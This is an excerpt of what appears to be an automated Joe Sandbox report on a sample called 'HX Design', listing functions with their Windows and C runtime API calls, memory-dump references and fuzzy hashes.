Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: f4b2e1b2bb084907932bbb50325c6fd9bc763b7e6436bb688bb8d2c92c9a8b51
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: C0418962B09A8182EB569B29D5447B973A8FB44B85F244136DB4D07BBDDF3DE4518300

Function 00007FF73206CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73206CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73206CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF73206CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF73206CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF73206CD21

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 0fbfbcdd6c9f05539b51e2fa2716257d61b27fea095dab5dc16ee6e8bec5e937
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 7C316C20F0C14775FA54BB64942A3B9A291EF55384FC45434DA4E4B2E3DEECB80CE238

Function 00007FF73207013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070277

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 4e52f43d3751e9ee8d3ead5ea3cc6b378f6371290f23be4914f33c39012a5b2e
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 82511921B0D241A6F764BA2D950077AE292BF84BB4F988734DD7D077D5CEBCE409E620

Function 00007FF73207C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF73207C2CD), ref: 00007FF73207C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF73207C2CD), ref: 00007FF73207C18A

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: 0951110e04afcd601b5bcd0ea8e43cb15c2962e5385ccc5e352e290fd50850b2
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 16110421708A8191DA20AB29B854079E361FB52FF0F940331EE7D0B7E8CEBCD018D710

Function 00007FF732075924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF732075957
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF73207596D

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction ID: c266c2288e70c2df7cf00052a8f31d9ea4a8d2f3847caffcfaa776bb6d21a138
Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction Fuzzy Hash: BB11A77160C742D1EB546B58A45107BF760FB84771F900236FAAD819E4EFACD458EB20

Function 00007FF73207AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABC6
GetLastError.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABD0

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 2efcec7a8f241a409b2e8334b8400b74e6397cc9e3deb9c6ccefcc9e219773cc
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: D721D811F0868261FEA4B759A49437D92929FC47A0F884239DA2E577D3CEEDE44DF320

Function 00007FF73207BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207BED4

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: e2d723c97b07eda993b38d71a23a8e668700ecbb1697e0c5dec6bab3d869dd4b
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 8541C532A1824597EA34BB1DA54027DF7A0EB55B90F900131EB8E437D1CFADE406EB71

Function 00007FF732067F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF73206803A

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
Instruction ID: ef733f37ffa014ac3a68f62e522e984fcfe559d21026ab6700ddab528cfe89e2
Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
Instruction Fuzzy Hash: 6821D321B18652A6FE90BA2279443BAE651FF45BC4FC85930EE0C07786CEBDE04DD324

Function 00007FF73207B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207B9C2

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: b2268808dcc6895e0fef63df0caa3147cf879b00530e18e2fb3714a2d01f9d31
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: F531A422A18652A6F751BB5D884137DAAA0AF80BA0FC10135E96D073D2DFFCE449E731

Function 00007FF732075F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075EF9

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 482b3acd5742264b58462f63515813273879aa820c5c5bf9170c4a8ece18edff
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: F511A531A1C64192FA60BF9994002BDEA60FF85B84FC44435EE8C57AD6CFBDD404E720

Function 00007FF732086354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732086377

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 3ad266e4316c9312677d1b971cfd184646fc60c70f333835db715ea51f52a890
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 7F213832A08A4597EB60AF18E08037EB3A0FB84B50F954234E7AD476D9DF7CD408DB10

Function 00007FFE0036F070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFE0036F1C3

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction ID: ae3b4e45158193d94bfd51937111f39f6acecb643cbccc76f759354729b89119
Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction Fuzzy Hash: 4F218176A0C7438EE7669E25B85127927A0FF01B98F288835DB49427EEDF3CE841C751

Function 00007FF7320703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070410

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b39856e5f9d064bf5c242c4a17b82f2fc38f4900213d07eb6032335b712e4a18
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: F101A561A0874552E904FF5A9A001B9E691FF85FE0F884631DE5C23BD6CEBCD445E310

Function 00007FF732068E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

LoadLibraryExW.KERNEL32(?,00007FF732066476,?,00007FF73206336E), ref: 00007FF732068EA2

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction ID: 6683e266e9d5f0095fe5c692f8cc6772742928eb71ae9f02a736d3f5f36ef597
Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction Fuzzy Hash: 51D0C201F3425552EA44B76BBA4663AD251AF89BC0FD8C035EE5D03B5AEC3CC0458B00

Function 00007FFE0031EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFE0031EE5D), ref: 00007FFE0031EF61

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction ID: d969cb3757adf44a3f446ca825414f03491994428d20a1b8fceadcaea66ced85
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: 05216232A08781C7D3549B26A5406AAB3A5FB88B94F144135EB9D43FA9CF3CD466CB04

Function 00007FFE00311DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFE0036F1C3

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction ID: 7710f0c7fe72c80de669569d8341e79f0e4461516dd15f80b029d495663d66a9
Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction Fuzzy Hash: 7F216D36E09243CAF766AA26B8412B92390FF45B84F24C430DB0D467FDDE3CE8418651

Function 00007FFE0031204A Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFE0031F39B

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction ID: 85e54d29289d181bc6d9d051e172b1000fb9b62f54871c81a8af6a41be58e138
Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction Fuzzy Hash: 8EF03C26A08B91C6E2019B16F8002AAA364FB89FC0F184435EF8D47BADCF3CD5418B00

Function 00007FF73207D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF732070C90,?,?,?,00007FF7320722FA,?,?,?,?,?,00007FF732073AE9), ref: 00007FF73207D63A

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: e46a7dc5416d65d3a91827f409b30fa18f877e6dfa75c5d0ca93540f6e0bde42
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 6CF0F810B09286A5FE647779584167592909F847A0FC80730DD7E862C2EEACA488E630

Non-executed Functions

Function 00007FF7320689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068A56

Part of subcall function 00007FF73207A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73207A490

Part of subcall function 00007FF73207871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078783

